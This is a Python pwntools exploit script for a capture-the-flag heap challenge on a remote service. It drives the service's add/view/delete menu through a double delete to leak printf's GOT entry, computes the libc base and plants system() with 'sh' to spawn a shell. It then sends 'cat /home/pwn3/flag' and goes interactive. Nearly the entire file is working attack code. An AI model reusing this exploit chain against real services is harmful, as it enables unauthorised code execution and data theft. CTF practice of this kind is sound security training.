#!/usr/bin/env python
from pwn import *
import sys

# Module-level setup: both ELF images are parsed at import time so the
# helpers and exploit() below can read their symbol/GOT tables.
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
binary = ELF('./bai_3_e17104059d3f25f3e8728ae2cc5277e0')
# Hard-coded address consumed by exploit() when it builds its first payload.
printf = 0x080487bb

# Attach to gdb
# gdb.attach(p, """
# """)

# The connection is opened at import time, not inside a function: with no
# command-line argument a local copy of the binary is spawned, with any
# argument the remote service is used (the argument's value itself is ignored).
if len(sys.argv) == 1:
    p = process('./bai_3_e17104059d3f25f3e8728ae2cc5277e0')
else:
    host = "dancecoin.nightst0rm.net"
    port = 1337
    p = remote(host, port)
# Menu helpers: each one sends a menu option on the module-level connection `p`
# and then answers the prompts the service prints.
def add(strlen, _str):
    """Choose menu option 1 and answer the "strlen:" and "str:" prompts.

    Args:
        strlen: length value; it is passed through int() and then str(),
            so a numeric string is accepted as well as an int.
        _str: content value, sent via str().
    """
    p.sendline("1")
    # Conversions happen after the menu choice is sent, as in the original flow.
    length_field = str(int(strlen))
    content_field = str(_str)
    p.sendlineafter("strlen:", length_field)
    p.sendlineafter("str:", content_field)
    log.success("Add %s OK!\n" % content_field)
def delete(index):
    """Choose menu option 3 and answer the "index:" prompt with *index*.

    The success message formats index with %d, so it must be an integer.
    """
    p.sendline("3")
    p.sendlineafter("index:", str(index))
    log.success("Delete successful at %d!\n" % index)
def view(index, delay):
    """Choose menu option 2, then answer the "(s):" and "view index:" prompts.

    Args:
        index: entry to view, sent at the "view index:" prompt.
        delay: value sent at the "(s):" prompt (presumably seconds — the
            prompt text is the only hint; confirm against the service).
    """
    p.sendline("2")
    # Prompt order matters: the service asks for the delay before the index.
    for prompt, value in (("(s):", delay), ("view index:", index)):
        p.sendlineafter(prompt, str(value))
    log.success("View OK!\n")
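def calculate(name, run_address, offset):
    """Return ``run_address - offset`` and print it as ``<name> is: 0x...``.

    Used to turn a leaked runtime address into a base address by subtracting
    the symbol's offset within the image.

    Args:
        name: label printed in front of the result.
        run_address: leaked runtime address (int).
        offset: the symbol's offset relative to the wanted base (int).

    Returns:
        The difference ``run_address - offset``.
    """
    # The original assigned result = 0 first and immediately overwrote it;
    # the dead store is dropped.
    result = run_address - offset
    print(name + " is: %#x" % (result))
    return result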
def exploit():
    """Drive the service through a fixed add/view/delete sequence, then hand the session to the user.

    Depends on module-level state: the connection `p`, the `libc`/`binary`
    ELF objects, the hard-coded `printf` address and the helpers
    add/delete/view/calculate. Every step below is order-dependent because
    each one consumes prompts and output from the remote side.
    """
    # 12-byte filler used as the content of the first five entries.
    message = "AAAA"
    message += "BBBB"
    message += "CCCC"
    add(0x11, message)
    add(0x11, message)
    add(0x11, message)
    add(0x11, message)
    add(0x11, message)
    # View index 1 (delay value 2), then delete the same index twice in a row.
    view(1, 2)
    delete(1)
    delete(1)
    # 8-byte entry: printf's GOT slot address followed by the module-level
    # `printf` constant (0x080487bb).
    payload = p32(binary.got['printf'])
    payload += p32(printf)
    add(8, payload)
    # Skip up to the next ":\n", then take the following 4 raw bytes as a
    # little-endian address and treat it as printf's runtime address.
    p.recvuntil(":\n")
    printf_addr = u32(p.recv(4))
    # Rebase libc from the leaked address; calculate() also prints the base.
    libc.address = calculate("[-]Libcbase", printf_addr, libc.symbols['printf'])
    # Logged at failure level even though it is informational output.
    log.failure("System: %#x" %(libc.symbols['system']))
    # Same view/delete/delete sequence on index 2, then an 8-byte entry made
    # of "sh" + two NUL bytes followed by system()'s rebased address.
    view(2, 2)
    delete(2)
    delete(2)
    ulti = "sh\x00\x00"
    ulti += p32(libc.symbols['system'])
    add(8, ulti)
    lo = log.progress("Capturing the flag")
    sleep(5)
    lo.success("Captured the flag")
    # Sends the same command ten times and prints whatever arrives each time.
    for i in range(10):
        p.sendline('cat /home/pwn3/flag')
        # NOTE: Python 2 print statement — a SyntaxError under Python 3, where
        # the print(...) form used in calculate() would be required.
        print p.recv(1024)
    p.interactive()
if __name__ == "__main__":
    # Entry point guard: exploit() runs only when this file is executed
    # directly, not when it is imported. Note that the connection in `p` is
    # already opened at import time regardless of this guard.
    exploit()